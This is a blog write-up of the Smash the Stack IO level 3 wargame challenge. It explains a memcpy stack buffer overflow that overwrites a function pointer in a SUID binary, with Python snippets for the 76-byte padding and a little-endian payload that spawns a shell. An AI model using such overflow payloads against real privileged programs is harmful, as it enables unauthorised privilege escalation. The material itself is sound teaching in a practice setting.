Tuesday, October 23, 2012

Smash the Stack IO Level 3 Writeup

Introduction

For the third level of Smash the Stack (IO), we are given both the source code and a binary to work with. As always, we will use the password obtained in the previous writeup to log in to the server as 'level3'. Let's take a look and see if we can find a way to extract the password for level 4.

Analyzing Level 3

As noted, we are given both the source code (level03.c) and a corresponding binary (level03). Let's start our analysis by dissecting the source code:

Immediately, we can see that we want to find some way to execute the 'good' function, as it spawns a shell which would give us level4 permissions since this is a SUID binary. It appears as though the 'bad' function, when executed, will give us a memory location we 'are at', as well as the memory location of the good function - where we want to be.

Moving on to the main function, we can see that we start by allocating a function pointer which points to the address of the 'bad' function. We can reason that we want to find some way to make the function pointer point to the 'good' function instead of the 'bad' function. We then create a 50-byte character array called 'buffer'.

After these two local variables have been created, we see our typical check for the appropriate number of arguments (in this case checking to see if we have provided one argument), and then we note that the program ensures that the length of our argument is >= 4. Otherwise, the program returns 0 and exits.

Assuming we pass the 'usage check' by providing one argument with length >= 4, the program then calls the memcpy function. By reading the documentation for the function, we see that it will copy length(our_argument) bytes from our argument into the buffer. After this, the program calls the memset function, which sets the first length(our_argument) - 4 bytes of buffer to 0, so only the last four bytes we copied survive. The program then prints out the address our functionpointer is pointing to, and calls the function at that address. We can see that somewhere before this call, we need to find a way to change the address functionpointer points to.
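To make the effect of those two calls concrete, here is a rough Python model of them. It is only a sketch: the 50-byte size comes from the description above, the helper name copy_then_clear is made up for illustration, and the model only covers arguments that actually fit in the buffer.

```python
BUFFER_SIZE = 50  # size of 'buffer' as described in this post


def copy_then_clear(arg: bytes) -> bytearray:
    """Hypothetical helper modelling memcpy() followed by memset()."""
    n = len(arg)  # plays the role of strlen(argv[1])
    if not 4 <= n <= BUFFER_SIZE:
        raise ValueError("this model only covers arguments of 4..50 bytes")
    buffer = bytearray(BUFFER_SIZE)  # zero-filled here; real stack memory holds leftovers
    buffer[:n] = arg                 # memcpy(buffer, argv[1], n)
    buffer[:n - 4] = bytes(n - 4)    # memset(buffer, 0, n - 4)
    return buffer


result = copy_then_clear(b"AAAAA")
print(bytes(result[:5]))  # one zeroed byte followed by the four surviving 'A's
```

Whatever we pass in, only the final four bytes of our argument are left intact, which is exactly the size of a pointer on 32-bit x86.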

To investigate, let's take a look at what we think our stack should look like before the memcpy function is called. Remember, the stack grows from high memory addresses to lower addresses.

The key thing to know about memcpy (and many similar functions such as strcpy()) is that it writes from low to high addresses. With this being the case, the data written to buffer is written towards our function pointer. Another key thing to know about these copy functions is that many of them do nothing to ensure that the data being written can actually fit in the buffer it's being written to. This lack of bounds checking keeps the functions fast and simple, but it can be dangerous.

Let's go back to our code to see why.

memcpy(buffer, argv[1], strlen(argv[1]));

We can see that the number of bytes we copy into the buffer depends only on the size of our input. The program does not check to make sure that our input is less than the storage space of the buffer. Instead, if we provide more data than can be stored in the buffer, memcpy simply keeps overwriting crucial memory until our argument has been stored. With this being the case, we can control what data is written into 'functionpointer'. This is an example of a stack based buffer overflow. Let's take a closer look with our debugger to see how we can exploit this vulnerability:
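Before jumping into the debugger, the idea can be sketched as a toy model in Python. Everything here is an assumption for illustration: the stack frame is reduced to a flat byte array with the buffer at offset 0, the function pointer is placed 76 bytes after it (the distance measured with GDB later in this post), and run_memcpy is a made-up helper name.

```python
POINTER_OFFSET = 76              # distance from buffer to functionpointer (measured later in the post)
FRAME_SIZE = POINTER_OFFSET + 4  # toy frame: buffer, padding, then a 4-byte pointer
BAD_ADDR = 0x80484a4             # address of 'bad' as printed by the program


def run_memcpy(arg: bytes) -> int:
    """Copy arg into the toy frame with no bounds check; return the pointer value afterwards."""
    if len(arg) > FRAME_SIZE:
        raise ValueError("the toy frame only models the first 80 bytes")
    frame = bytearray(FRAME_SIZE)
    # x86 keeps the pointer in memory least significant byte first
    frame[POINTER_OFFSET:] = BAD_ADDR.to_bytes(4, "little")
    frame[:len(arg)] = arg       # memcpy: low to high addresses, length decided by the input alone
    return int.from_bytes(frame[POINTER_OFFSET:], "little")


print(hex(run_memcpy(b"A" * 5)))   # short input: pointer untouched
print(hex(run_memcpy(b"A" * 77)))  # one byte too many: lowest pointer byte becomes 0x41
print(hex(run_memcpy(b"A" * 80)))  # pointer fully replaced by our data
```

The point of the model is simply that nothing between the start of the buffer and the pointer stops the copy.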

We aren't going to pick this entire disassembled program apart, as it would take an entire blog post by itself (though there might be one in the future if it is requested). However, what we want to do is see how our stack is structured, as well as verify our theory that memory will be written from low to high addresses. Let's put a breakpoint right after the memcpy function is executed, run the program with the argument 'AAAAA', and see what we find.

Let's examine what's going on in the snippet above. We first set our breakpoint at the address of the instruction after the call to memcpy. Then, we run the program using 'AAAAA' as the provided argument, and once the breakpoint is reached, we tell GDB that we want to examine 32 words in hexadecimal, starting at ESP and going towards higher memory addresses. This allows us to see the stack. From here, we can note that our argument has been copied to the local 'buffer' variable, starting at the address 0xbfffdc80. The value \x41 is ASCII for 'A', and is the customary filler when checking for buffer overflows, largely because a run of 0x41 bytes is easy to recognize in a memory dump.

From this output, we can tell that the values are being copied from lower addresses to higher addresses. We then need to find out how many bytes it would take to reach our function pointer (it's not always going to be exactly the length of the buffer, since the compiler may add some padding between the two). To do this, we first need to find the address of our function pointer. Then, we can subtract our buffer's starting address from it to obtain the number of bytes we need to fill before we can change the contents of the function pointer.
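As a quick sanity check, the subtraction can be done in Python. The two addresses are the ones this post reads off the stack dump (the buffer at 0xbfffdc80 and the function pointer at 0xbfffdccc); they will almost certainly differ on another machine or environment, so treat them as example values.

```python
BUFFER_ADDR = 0xbfffdc80   # start of 'buffer' in this post's stack dump
POINTER_ADDR = 0xbfffdccc  # location of 'functionpointer' in the same dump
BUFFER_SIZE = 50           # declared size of 'buffer'

offset = POINTER_ADDR - BUFFER_ADDR  # bytes to fill before reaching the pointer
padding = offset - BUFFER_SIZE       # extra bytes the compiler left after the buffer

print(offset, hex(offset))  # 76 0x4c
print(padding)              # 26
```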

We can find the address of the function pointer in two ways:

Use our GDB disassembly

Run the program (as it will tell us the address of our function pointer)

We can see at the beginning of our program that we load the address of a function into one of our local variables. Then, at the end of our program, we load this address into eax and call the function located at that address. We can use this information to deduce that our function pointer contains the address 0x80484a4.

Analysis by Running the Program:
If we run the program without overwriting the contents of the function pointer, we will see its contents.

level3@io:~$ /levels/level03 AAAAA
This is exciting we're going to 0x80484a4
I'm so sorry, you're at 0x80484a4 and you want to be at 0x8048474

As was the case with our GDB analysis, our function pointer appears to contain the address 0x80484a4. We can then use this knowledge to find the address at which our function pointer resides. Referring back to our stack output, we can see that the function pointer starts at the address 0xbfffdccc. If we subtract the starting address of our buffer (0xbfffdc80), we see that there are 76 bytes that we need to fill with garbage before we reach the contents of the function pointer. Let's verify that real quick. As a side note, typing out 76 'A's can be exhausting, so let's let scripting do the work for us. We can print 76 'A's using Python with the following command:

python -c 'print "A"*76'

Then, if we wrap the command inside $(command), the shell replaces it with the command's output, and our program receives that output as its first argument. This can be invaluable in crafting exploits.

Perfect. As we suspected, we have successfully written data right up to the start of the function pointer. Now we just need to overwrite the contents of the function pointer with the correct address (that of the 'good' function, 0x8048474). However, one thing to remember is that x86 processors store data in little-endian byte order. Therefore, we need to write the bytes of the address in reverse order, least significant byte first, so that they are stored correctly.
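If reversing bytes by hand feels error-prone, Python's struct module can do it. This is just a small illustration using the address of 'good' printed by the program above; the "<I" format means a little-endian unsigned 32-bit integer.

```python
import struct

GOOD_ADDR = 0x8048474  # address of 'good' as reported by the program

packed = struct.pack("<I", GOOD_ADDR)  # little-endian, 4 bytes
print(packed.hex())                    # 74840408
```

Read left to right, those are the bytes \x74 \x84 \x04 \x08, which is the order they need to appear in our argument.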

Crafting the Final Exploit

As done previously, we will use Python to fill the first 76 bytes, and then we will overwrite the function pointer with the correct address. Our final exploit will look like this:
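For reference, here is one way the payload could be put together as a small Python 3 script. Treat it as a sketch under assumptions rather than the exact command used in this post: the 76-byte offset and the address 0x8048474 are the values found above, while the function name build_payload and the idea of saving it as a script are my own additions.

```python
import struct
import sys

PADDING_LEN = 76       # bytes between the start of 'buffer' and 'functionpointer'
GOOD_ADDR = 0x8048474  # address of 'good' as reported by the program


def build_payload(padding_len: int = PADDING_LEN, target: int = GOOD_ADDR) -> bytes:
    """Filler bytes followed by the target address in little-endian order."""
    payload = b"A" * padding_len + struct.pack("<I", target)
    # A NUL byte cannot be passed inside a command-line argument,
    # and strlen() in the target would stop counting at it anyway.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    return payload


if __name__ == "__main__":
    # Write raw bytes; print() would add a newline and may re-encode non-ASCII bytes.
    sys.stdout.buffer.write(build_payload())
```

Assuming the script were saved under a hypothetical name such as exploit.py and Python 3 is available on the box, it could be fed to the binary with /levels/level03 $(python3 exploit.py). Note that the memset call zeroes the first 76 bytes of our 80-byte argument, which leaves exactly the four address bytes intact.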

Awesome. Just as we expected, we overwrote the function pointer and called the 'good' function, resulting in our shell. I hope this helped, and as always, if you ever have any questions or comments, leave them below!